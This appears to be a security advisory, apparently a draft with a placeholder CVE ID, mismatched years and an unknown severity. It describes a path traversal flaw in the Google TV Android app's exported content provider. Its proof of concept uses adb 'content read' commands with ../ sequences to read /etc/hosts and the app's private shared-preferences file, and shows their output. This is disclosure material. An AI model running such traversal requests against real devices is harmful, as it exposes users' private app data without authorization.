CVE-2024-yaytempyay Details
| Product | Google TV version 4.39.2590.678247678.4-release |
| Severity | ??? |
| CVE Reference | CVE-2025-yaytempyay |
| Type | Path Traversal |
Description
The Google TV Android application (com.google.android.videos) had an exported Content Provider which contains a Path Traversal vulnerability. Specifically, the vulnerable Content Provider is com.google.android.apps.googletv.app.image.PosterSharingContentProvider.
This issue was exploitable under the following conditions:
- The underlying Google Account was a part of a Google Family
- The Google Family had previously purchased products in the Family Library
- The application has previously been opened and viewed the Highlights section
Impact
This can allow the calling application to view files on the file system within the context of the Google TV Android application.
Proof of Concept (PoC)
The following code snippet shows that the adb shell user on a Samsung Galaxy S24 could abuse the vulnerable Content Provider to read the /etc/hosts file:
e1s:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),1078(ext_data_rw),1079(ext_obb_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid),3012(readtracefs) context=u:r:shell:s0
e1s:/ $ content read --uri content://com.google.android.videos.postersharingcontentprovider/../../../../../../etc/hosts
127.0.0.1 localhost
::1 ip6-localhost
Additionally, this issue could have been used to read files that were in Google TV’s private files directory:
e1s:/ $ cat /data/data/com.google.android.videos/shared_prefs/registration_data.xml
cat: /data/data/com.google.android.videos/shared_prefs/registration_data.xml: Permission denied
e1s:/ $ content read --uri content://com.google.android.videos.postersharingcontentprovider/../../shared_prefs/registration_data.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="last_successful_registration_environment_url">notifications-pa.googleapis.com</string>
<boolean name="is_registered_to_unified_fcm_registration" value="false" />
<int name="last_successful_registration_request_hash_code" value="364779808" />
<long name="last_successful_registration_time_ms" value="1728826771075" />
<string name="fetch_only_id">c21e1400-64e6-4663-a32c-5682569d2bc1</string>
<string name="internal_target_id">Ch1nY21fZm86djE6Njc3MDQ3MDA2Mzg2MzMxNTk2Nw</string>
<int name="last_successful_registration_account_type" value="1" />
</map>
Technical Details
The vulnerable Content Provider is meant to host files that are hosted in /data/user/0/com.google.android.videos/files/offline_images/. However, this directory is not created by default.
One method to create this directory is to go to the Highlights section of the application, assuming that the underlying Google account met the following conditions:
- The Google Account was a part of a Google Family
- The Google Family had previously purchased TV shows or movies
Once those conditions are met, any application could have exploited this issue by added ../ characters to the Content Provider URI.